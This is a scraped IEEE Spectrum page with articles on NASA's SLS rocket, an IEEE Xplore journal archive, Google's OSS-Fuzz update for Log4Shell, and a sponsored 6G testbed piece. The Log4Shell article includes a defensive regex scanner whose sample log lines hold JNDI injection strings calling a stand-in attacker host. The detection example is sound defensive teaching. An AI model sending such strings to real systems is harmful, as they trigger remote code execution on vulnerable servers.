NASA’s Space Launch System Will Lift Off - IEEE Spectrum



But with rival rockets readying for flight, the value of SLS is murky

Last October, an Orion spacecraft was mounted atop the Space Launch System.

Inside the Vehicle Assembly Building (VAB) at NASA’s Kennedy Space Center in Florida—a cavernous structure built in the 1960s for constructing the Apollo program’s Saturn V rockets and, later, for preparing the space shuttle—the agency’s next big rocket is taking shape.

Tom Whitmeyer, NASA’s deputy associate administrator for exploration system development, recalled seeing the completed Space Launch System (SLS) vehicle there in October, after the last component, the Orion spacecraft, was installed on top. To fully view the 98-meter-tall vehicle, he had to back off to the opposite side of the building.

“It’s taller than the Statue of Liberty,” he said at an October 2021 briefing about the rocket’s impending launch. “And I like to think of it as the Statue of Liberty, because it’s [a] very engineering-complicated piece of equipment, and it’s very inclusive. It represents everybody.”

Perhaps so. But it’s also symbolic of NASA’s way of developing rockets, which is often characterized by cost overruns and delays. As this giant vehicle nears its first launch later this year, it runs the risk of being overtaken by commercial rockets that have benefited from new technologies and new approaches to development.

NASA’s newest rocket didn’t originate in the VAB, of course—it began life on Capitol Hill. In 2010, the Obama administration announced its intent to cancel NASA’s Constellation program for returning people to the moon, citing rising costs and delays. Some in Congress pushed back, worried about the effect on the space industry of canceling Constellation at the same time NASA was retiring its space shuttles.

The White House and Congress reached a compromise in a 2010 NASA authorization bill. It directed the agency to develop a new rocket, the Space Launch System, using technologies and contracts already in place for the shuttle program. The goal was to have a rocket capable of placing at least 70 tonnes into orbit by the end of 2016.

To achieve that, NASA extensively repurposed shuttle hardware. The core stage of SLS is a modified version of the external tank from the shuttle, with four RS-25 engines developed for the shuttle mounted on its base. Attached to the sides of the core stage are two solid-rocket boosters, similar to those used on the shuttle but with five segments of solid fuel instead of four.


Mounted on top of the core stage is what’s called the Interim Cryogenic Propulsion Stage, which is based on the upper stage of the Delta IV rocket and is powered by a single RL10 engine, a design that has been used for decades. Once the vehicle reaches orbit, this stage will propel the Orion capsule to the moon or beyond. As the name suggests, the stage is a temporary one: NASA is developing a more powerful Exploration Upper Stage, with four RL10 engines, but it won’t be ready until the mid-2020s.

Even though SLS uses many existing components and was not designed for reusability, combining those components to create a new rocket proved more difficult than expected. The core stage, in particular, turned out to be surprisingly complex, as NASA struggled with the challenge of incorporating four engines. Once the first core stage was complete, it spent more than a year on a test stand at NASA’s Stennis Space Center in Mississippi, including two static-fire tests of its engines, before going to the Kennedy Space Center for launch preparations.

Those difficulties pushed back the first SLS launch by years, although not all the problems were within NASA’s control. Hurricanes damaged the Stennis test stand as well as the New Orleans facility where the core stage is built. The pandemic also slowed the work, before and after all the components arrived at the VAB for assembly. “In Florida in August and September [2021], it hit our area very hard,” said Mike Bolger, manager of the exploration ground systems program at NASA, describing the most recent wave of the pandemic at the October briefing.

Now, after years of delays, the first launch of the SLS is finally getting close. “Completing stacking [of the SLS] is a really important milestone. It shows that we’re in the home stretch,” said Mike Sarafin, NASA’s manager for the first SLS mission, called Artemis 1, at the same briefing.

After a series of tests inside the VAB, the completed vehicle will roll out to Launch Complex 39B. NASA will then conduct a practice countdown called a wet dress rehearsal—“wet” because the core stage will be loaded with liquid-hydrogen and liquid-oxygen propellants.

Controllers will go through the same steps as in an actual countdown, stopping just before the point where the RS-25 engines would normally ignite. “For us, on the ground, it’s a great chance to get the team and the ground systems wrung out and ready for launch,” Bolger said of the wet dress rehearsal.

This giant tank will help increase the capacity for storing liquid hydrogen at the Kennedy Space Center. Glenn Benson/NASA

After that test, the SLS will roll back to the VAB for final checks before returning to the pad for the actual launch. The earliest possible launch for Artemis 1 is 12 February 2022, but at the time of this writing, NASA officials said it was too soon to commit to a specific launch date.

“We won’t really be in a position to set a specific launch date until we have a successful wet dress [rehearsal],” Whitmeyer said. “We really want to see the results of that test, see how we’re doing, see if there’s anything we need to do, before we get ready to launch.”

To send the uncrewed Orion spacecraft to the moon on its desired trajectory, SLS will have to launch in one of a series of two-week launch windows, dictated by a variety of constraints. The first launch window runs through 27 February. A second opens on 12 March and runs through 27 March, followed by a third from 8 to 23 April. Sarafin said there’s a “rolling analysis cycle” to calculate specific launch opportunities each day.

A complicating factor here is the supply of propellants available. The core stage’s tanks store 2 million liters of liquid hydrogen and almost three-quarters of a million liters of liquid oxygen, putting a strain on the liquid hydrogen available at the Kennedy Space Center.

“This rocket is so big, and we need so much liquid hydrogen, that our current infrastructure at the Kennedy Space Center just does not support an every-day launch attempt,” Sarafin said. If a launch attempt is postponed after the core stage is fueled, Bolger explained, NASA would have to wait days to try again. That’s because a significant fraction of liquid hydrogen is lost to boil-off during each launch attempt, requiring storage tanks to be refilled before the next attempt. “We are currently upgrading our infrastructure,” he said, but improvements like larger liquid hydrogen storage tanks won’t be ready until the second SLS mission in 2023. There’s no pressure to launch on a specific day, Sarafin said. “We’re going to fly when the hardware’s ready to fly.”

SLS is not the only game in town when it comes to large rockets. In a factory located just outside the gates of the Kennedy Space Center, Blue Origin, the spaceflight company founded by Amazon’s Jeff Bezos, is working on its New Glenn rocket. While not as powerful as SLS, its ability to place up to 45 tonnes into orbit outclasses most other rockets in service today. Moreover, unlike SLS, the rocket’s first stage is reusable, designed to land on a ship.

New Glenn and SLS do have something in common: development delays. Blue Origin once projected the first launch of the rocket to be in 2020. By early 2021, though, that launch date had slipped to no earlier than the fourth quarter of 2022.


A key factor in that schedule is the development of Blue Origin’s BE-4 engine, seven of which will power New Glenn’s first stage. Testing that engine has taken longer than expected, affecting not only New Glenn but also United Launch Alliance’s new Vulcan Centaur rocket, which uses two BE-4 engines in its first stage. Vulcan’s first flight has slipped to early 2022, and New Glenn could see more delays as well.

Meanwhile, halfway across the country at the southern tip of Texas, SpaceX is moving ahead at full speed with its next-generation launch system, Starship. For two years, the company has been busy building, testing, flying—and often crashing—prototypes of the vehicle, culminating in a successful flight in May 2021 when the vehicle lifted off, flew to an altitude of 10 kilometers, and landed.

SpaceX is now preparing for orbital test flights, installing the Starship vehicle on top of a giant booster called, aptly, Super Heavy. A first test flight will see Super Heavy lift off from the Boca Chica, Texas, test site and place Starship in orbit. Starship will make less than one lap around the planet, though, reentering the atmosphere and splashing down in the Pacific about 100 kilometers from the Hawaiian island of Kauai.

When that launch will take place remains uncertain—despite some optimistic announcements. “If all goes well, Starship will be ready for its first orbital launch attempt next month, pending regulatory approval,” SpaceX CEO Elon Musk tweeted on 22 October 2021. But Musk surely must have known at the time that regulatory approval would take much longer.

SpaceX needs a launch license from the U.S. Federal Aviation Administration to perform that orbital launch, and that license, in turn, depends on an ongoing environmental review of Starship launches from Boca Chica. The FAA hasn’t set a schedule for completing that review. But the draft version was open for public comments through the beginning of November, and it’s likely to take the FAA months to review those comments and incorporate them into the final version of the report. That suggests the initial orbital flight of Starship atop Super Heavy won’t take place until sometime in early 2022 at the earliest.

Starship could put NASA in a bind. The agency is funding a version of Starship to serve as a lunar lander for the Artemis program, transporting astronauts to and from the surface of the moon as soon as 2025. So NASA clearly wants Starship development to proceed apace. But a successful Starship launch vehicle, fully reusable and able to place 100 tonnes into orbit, could also make the SLS obsolete.

Of course, on the eve of the first SLS launch, NASA isn’t going to give up on the vehicle it’s worked so long and hard to develop. “SLS and Orion were purpose-designed to do this mission,” says Pam Melroy, NASA deputy administrator. “It’s designed to take a huge amount of cargo and people to deep space. Therefore, it’s not something we’re going to walk away from.”

Jeff Foust, a frequent contributor to IEEE Spectrum, is a senior staff writer with SpaceNews. He has a Ph.D. in planetary sciences from MIT and a B.S. in geophysics and planetary science from Caltech.

Articles going back to 1909 are now in IEEE Xplore

Kathy Pretz is editor in chief for The Institute, which covers all aspects of IEEE, its members, and the technology they're involved in. She has a bachelor's degree in applied communication from Rider University, in Lawrenceville, N.J., and holds a master's degree in corporate and public communication from Monmouth University, in West Long Branch, N.J.

The full archives of the SAIEE Africa Research Journal—some issues dating back more than 100 years—are now available in the IEEE Xplore Digital Library.

The open-access quarterly journal from the South African Institute of Electrical Engineers publishes peer-reviewed articles on research in IEEE’s fields of interest. The digitization of the 5,000 articles published between 1909, when the journal launched, and 2008 took almost eight years to complete. The archive joins the articles from 2009 onward that were added to IEEE Xplore in 2018.

“Prior to 2005, the journal was published in print. This was therefore a big project,” says IEEE Fellow Saurabh Sinha, the journal’s managing editor. “From the digitized articles, using optical character recognition, search features were enabled—which is amazing.”

Sinha, a former vice president of IEEE Educational Activities and a former IEEE Board of Directors member, is one of the IEEE volunteers who led the effort. He is a professor and a deputy vice chancellor for research and internationalization at the University of Johannesburg.

The digital library now houses the journal’s entire collection. The majority of the authors are from Africa. In collaboration with the IEEE Africa Council, special issues focus on areas such as East Africa.

The SAIEE Africa Research Journal is one of the oldest electrical engineering journals, Sinha says. It originally was called Transactions of the SAIEE and was renamed when the journal went digital in 2005.

The Transactions of AIEE from the American Institute of Electrical Engineers, one of IEEE’s predecessor societies, is the oldest such journal. It began publishing in 1884.

With the SAIEE Africa Research Journal on IEEE Xplore, millions of engineers, researchers, and students around the world are able to discover and read about the research activities in the journal, notes Naveen Maddali, senior product manager for planning and implementation for IEEE Global Products and Marketing.

“SAIEE’s exposure to a global audience is increased, while IEEE is able to provide additional valuable research content to the users of IEEE Xplore,” Maddali says.

The relationship between IEEE and SAIEE goes back to 1995, when the two organizations signed an IEEE National Society Agreement. They committed to working together to “enhance the professional and personal growth” of the region’s engineers “and related fields of interest.” They do so by elevating technical skills, enhancing the image of the profession, encouraging professional growth, and developing networking opportunities.

Sinha says the agreement has engendered a collegial relationship between the two organizations over the years.


“I think it really is a renewed relationship through this journal between the SAIEE and IEEE,” he says, “which will bring about value for both organizations in the future.”

Sinha credits IEEE staff members from several organizational units for the success of the archive project.

“I’ve been a volunteer now for more than 20 years, and I think the support of the staff was quite phenomenal,” he says. “Just imagine the magnitude of the project. Through this collaboration, the SAIEE Africa Research Journal was able to extend its reach and exposure. I think the power of IEEE Xplore really pulls in SAIEE’s fields of interest.”

Funding for the project came from the IEEE Foundation and the IEEE Africa Council, which is a sponsor of the journal. Hosting such a large archive would ordinarily be prohibitively expensive, but the SAIEE and key IEEE volunteers worked with IEEE and the IEEE Foundation to find the money, Sinha says.

They were able to use existing funds that were donated to the AIEE in the early 1900s. Because of the limitations placed on how money from the funds could be used, IEEE sought and received permission in 2013 to modify the use of the funds to be able to support projects, like this one, that add scholarly content from a non-U.S. publisher to the digital library, according to the IEEE Foundation’s executive director Karen Galuchi.

Updated “fuzzing” service now sleuthing after the Internet’s latest (and greatest?) vulnerability

Edd Gent is a freelance science and technology writer based in Bangalore, India. His writing focuses on emerging technologies across computing, engineering, energy and bioscience. He's on Twitter at @EddytheGent and email at edd dot gent at outlook dot com. His PGP fingerprint is ABB8 6BB3 3E69 C4A7 EC91 611B 5C12 193D 5DFC C01B.

A major bug in a widely used piece of open source software called Log4j has thrown the IT world into pandemonium. The vulnerability was made public less than a month ago (as of this writing), and yet it’s already been classified by Internet security analysts as among the biggest in cybersecurity history.

By some estimates, some 93 percent of enterprise cloud computing environments around the world are affected. According to sources quoted in the Financial Times, more than 1.2 million cyberattacks (at rates of up to 100 attacks per minute) had been observed as of 14 December, with no end in sight for, these sources say, “months to come.”

As the industry scrambles to plug the gaps, Google has upgraded one of its security tools to help open source developers hunt down the vulnerability and others like it.

The panic around this new bug, which has been dubbed Log4Shell, is primarily down to its sheer pervasiveness. The tool it targets is used in a huge number of applications and the list of affected services is a who’s who of leading tech companies. The nature of the vulnerability also makes it relatively simple for attackers to run code that lets them take complete control of targeted devices.

“Fuzzing” bombards programs with random inputs to force errors that reveal security vulnerabilities. Google has now updated its fuzzing tool to track down Log4Shell—the name for the vulnerability in Apache’s ubiquitous Log4j code.

When the bug was disclosed on December 9, it was given a severity score of 10 out of 10 by the Apache Software Foundation (ASF), the non-profit whose volunteers develop Log4j. While ASF has released patches that remedy the flaw, it could take months or even years to find and fix every instance. The incident has reignited debates around how reliant today’s critical computing infrastructure is on open source code, which is typically maintained by small teams of under-resourced developers working for free in their spare time.

While there’s no silver bullet, Google’s open source security team thinks one potential solution is to provide open source developers with better tools to hunt for bugs. One promising approach is called “fuzzing,” which bombards programs with random or intentionally invalid inputs to force errors that reveal stability issues or security vulnerabilities. Google has provided a free continuous fuzzing service called OSS-Fuzz to major open source projects since 2016. And now the company has collaborated with security firm Code Intelligence to update the tool so that it can hunt down Log4Shell and other vulnerabilities that rely on the same mode of attack.
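The core idea of fuzzing fits in a few lines. The sketch below is a toy Python illustration, not part of OSS-Fuzz: the `parse_header` target, its latent bug, and the random-input loop are all invented for the example.

```python
import random
import string

def parse_header(data: str) -> dict:
    """Toy target: parses 'key=value;key=value' strings; has a latent bug."""
    fields = {}
    for part in data.split(";"):
        key, value = part.split("=")  # raises ValueError if '=' is missing or doubled
        fields[key] = value
    return fields

def fuzz(target, iterations=10_000, seed=0):
    """Bombard `target` with random inputs; collect the ones that crash it."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + "=;"
    crashes = []
    for _ in range(iterations):
        candidate = "".join(rng.choice(alphabet)
                            for _ in range(rng.randint(0, 12)))
        try:
            target(candidate)
        except Exception as exc:
            crashes.append((candidate, type(exc).__name__))
    return crashes

crashes = fuzz(parse_header)
print(f"{len(crashes)} crashing inputs found")
```

Production fuzzers like those behind OSS-Fuzz add coverage feedback and input mutation on top of this brute-force loop, steering the random inputs toward code paths they haven’t exercised yet.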

“We're trying to expand the tool's capabilities to find similar sorts of vulnerabilities so that more developers can secure their own code bases,” says Google’s Jonathan Metzman. “The developer doesn't really need to think about how the fuzzer is detecting them; it just does it for them.”

Given the complexity of modern software, developers don’t have time to build every module from scratch, so they often rely on open source components like Log4j. Written in Java, Log4j keeps records of activity within applications, which helps track errors and performance problems. Clicking on a dead link or typing in a wrong URL, for example (events that typically produce a 404 error message), are among the activities Log4j records for a web domain’s system administrators. Log4j thus performs a critical function for many types of software, which is the reason for the tool’s ubiquity.
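Log4j itself is a Java library, but the role it plays is the same one any application logger plays. As a rough analogy, here is the equivalent job done with Python’s standard-library `logging` module; the `handle_request` function, its paths, and the log format are illustrative, not from any real web server.

```python
import logging

# Configure a logger much as an application would configure Log4j:
# a message format, a severity threshold, and a destination for records.
logging.basicConfig(
    format="%(asctime)s %(levelname)s %(name)s - %(message)s",
    level=logging.INFO,
)
log = logging.getLogger("webapp")

def handle_request(path: str, known_paths: set) -> int:
    """Return an HTTP status code, logging the outcome as it goes."""
    if path in known_paths:
        log.info("200 OK for %s", path)
        return 200
    # The kind of event Log4j routinely records: a bad URL, a 404.
    log.warning("404 Not Found for %s", path)
    return 404

handle_request("/home", {"/home"})
handle_request("/no-such-page", {"/home"})
```

The Log4Shell flaw arose because Log4j went further than this: instead of treating logged messages as inert text, it interpreted special `${...}` lookup syntax inside them.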

Building a fix is only the first step in getting the crisis under control; now developers and system administrators across the industry have to scour their code for instances of the bug.

But last month, engineers at Chinese tech firm Alibaba discovered they could get Log4j to log a message containing a string of malicious code that triggers a connection to an external server under their control. Once this connection is established, the attacker can remotely run whatever code they want on the targeted system.

The Alibaba researchers notified ASF as soon as they found the bug and gave the foundation time to create an update that deals with the vulnerability before disclosing it. Since then, two more, harder-to-exploit vulnerabilities in Log4j have been uncovered and patched. But building a fix is only the first step in getting the crisis under control; now developers and system administrators across the industry have to scour their code for instances of the bug.
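One blunt but common first step in that scouring is simply searching logs and request data for the `${jndi:` lookup syntax that triggers the bug. The sketch below is a minimal illustration: the two regex patterns and the sample log lines are invented for the example, and real scanners must handle far more obfuscated variants than these.

```python
import re

# Matches the basic JNDI lookup syntax behind Log4Shell, plus one common
# obfuscation that nests lookups like ${${lower:j}ndi:...}. Real-world
# scanners cover many more evasions than these two patterns.
SUSPICIOUS = re.compile(r"\$\{jndi:|\$\{[^}]*\$\{", re.IGNORECASE)

def scan_lines(lines):
    """Return (line_number, line) pairs that look like exploit attempts."""
    return [(i, line) for i, line in enumerate(lines, start=1)
            if SUSPICIOUS.search(line)]

sample_log = [
    "GET /index.html HTTP/1.1 user-agent=Mozilla/5.0",
    "GET / HTTP/1.1 user-agent=${jndi:ldap://attacker.example/a}",
    "GET / HTTP/1.1 user-agent=${${lower:j}ndi:ldap://attacker.example/a}",
]
hits = scan_lines(sample_log)
print(f"{len(hits)} suspicious lines")
```

Pattern matching like this only flags attempts recorded in logs; it cannot tell whether a vulnerable Log4j copy is present, which is why dependency scanning and patching remain the real fix.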

“The way software is built today is very much layer upon layer upon layer,” says Gary Gregory, a member of the ASF project management committee responsible for Log4j. “So developers, applications, companies may not even realize whether or not they're using certain software.”

Even once they’ve found the bug, some companies have stringent processes governing how they can make updates, which may delay their ability to resolve the problem, says Gregory. There are also likely to be companies relying on older software that is no longer supported or whose vendors are now defunct.

And while the updates put out by ASF have completely removed the functionality that allows the Log4j tool to connect to an external server, Gregory points out that it’s a generic capability baked deep into Java. “We've just ripped that out,” he says. “But I'm betting people will look at other software programs for the same type of vulnerability.”

This functionality is exactly what Google’s updated fuzzer looks for, which means that as well as detecting Log4Shell, it should also be able to find other bugs that use the same mode of attack. The tool is not a replacement for more formal security testing, but OSS-Fuzz has already discovered more than 7,000 vulnerabilities since its launch.

Metzman says the group has plans to further expand the kinds of bugs OSS-Fuzz can detect as well, and believes the approach can be a powerful tool for under-resourced open-source teams. “The randomness of fuzzing explores a lot of program states,” he says. “It’s very good at reaching these kind of obscure states that are deep into the program and finding vulnerabilities in there.”

It's hard to say whether this kind of tool could help catch the next major vulnerability, says Metzman. But he points out that researchers have shown that fuzzing could have detected the Heartbleed bug that set the internet on fire in 2014. If we want to catch the next major vulnerability, though, we need to provide more support to open source developers across the board, says John Hammond from security firm Huntress Labs. His company also released a tool to test for Log4Shell in the aftermath of the disclosure, but he thinks an even more important goal is to increase education and awareness of security issues in the open source community. With any luck, this crisis will provide the impetus, he says.

"Maybe it will shine a spotlight on the fact that we need a little bit more love for the open source community," he adds. "Because a lot of our modern world and technology certainly stands on their shoulders."

Developing tools that can test new technologies for 6G networks is the key step in making it a reality

This is a sponsored article brought to you by National Instruments (NI).

While 5G networks continue their rollout around the world, researchers and engineers are already looking ahead to a new generation of mobile networks, dubbed 6G. One of the key elements for 6G networks will be to move beyond the millimeter wave (mmWave) spectrum and up into the terahertz (THz) spectrum. The THz spectrum will certainly open up more bandwidth, but there are a number of technical challenges that will need to be addressed before mobile networks can exploit this spectrum.

“The higher carrier frequencies of THz communications in 6G networks yield even harder propagation conditions than mmWave transmission,” said Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments. “These high attenuations can be overcome by antenna designs specifically tailored to yield respective antenna gains with pencil-like beams.”

It is in the design of these new kinds of antennas and network hardware where National Instruments (NI) is working hand-in-hand with researchers around the world who are trying to make 6G a reality.

Simplified block diagram of a bidirectional system capable of real-time two-way communications.

The challenges of moving to THz are not limited to the antennas. The design of RF ICs for THz frequencies brings additional obstacles as the wavelength falls in the range of the IC size, putting further constraints on the design methodology, according to Nitzold.

Nitzold also points out that technologies like CMOS appear able to scale only up to about 140 GHz, which creates problems with the linearity of components over bandwidths of multiple gigahertz and with transmit output power (TX power). Further, the demands of baseband processing and of fast, precise management of pencil-like beams will make this a challenging research area.

If research addressing these issues is to succeed, a new generation of testbeds needs to be set up with high-performance, real-time capability. Because THz testbeds will have range limitations due to path loss, initial testbeds will be limited to lab-based setups consisting mostly of simple short-range components such as horn antennas, according to Nitzold.

“Terahertz Communications have the potential to even replace fiber-optic cables with dedicated point-to-point transmission.”

—Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments

However, as soon as larger deployments in testbeds become a reality, the high bandwidth use-cases will put additional requirements on throughput of the backend, especially when testbeds try to set up a disaggregated radio access network (RAN) structure with distributed THz nodes. These would need to be individually served with fiber connections.

“The cost of investments for THz testbeds will become even larger due to the groundbreaking technological changes, demanding for strong cooperation between many partners to stem this effort jointly,” noted Nitzold.

NI is looking ahead to addressing these testbed issues with its sub-THz and mmWave Transceiver System (MTS), which provides a flexible, high-performance platform to demonstrate real-world results for high-frequency research and prototyping.

System diagram of transmit and receive chains.

The modular system architecture can be configured to meet a variety of use cases, built on a common set of components. LabVIEW reference examples provide a starting point for channel sounding and physical layer IP experiments, while allowing the user to modify IP to perform research into new areas. A multi-FPGA processing architecture enables a truly real-time system with no offline processing needed and with 2 GHz of real-time bandwidth, enabling over-the-air (OTA) prototypes of two-way communications links.

“The strength of the NI approach lies in a flexible and scalable modular hardware and software platform,” said Nitzold. “This platform is suitable to adjust to different needs of a testbed, e.g., interface to new RF frontends as well as other components.”

Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments.

Another benefit of NI’s approach is the incorporation of industry-standard functional splits, which allows for a distributed deployment in a testbed and flexible realization of different use-cases, according to Nitzold. “Additionally, NI focuses on real-time processing for communication links to showcase the theoretic gains in scenarios that are close to reality,” he added.

All of this will ultimately make it possible to access the THz spectrum and its greater bandwidth.

“The THz regime will allow for new opportunities and applications such as immersive virtual reality, mobile holograms, wireless cognition, and the possibility to sense the environment in an unprecedented accuracy with a possible combination of radar and communication,” said Nitzold.

“Terahertz Communications have the potential to even replace fiber-optic cables with dedicated point-to-point transmission. This will also allow new ways of intra-device communication.”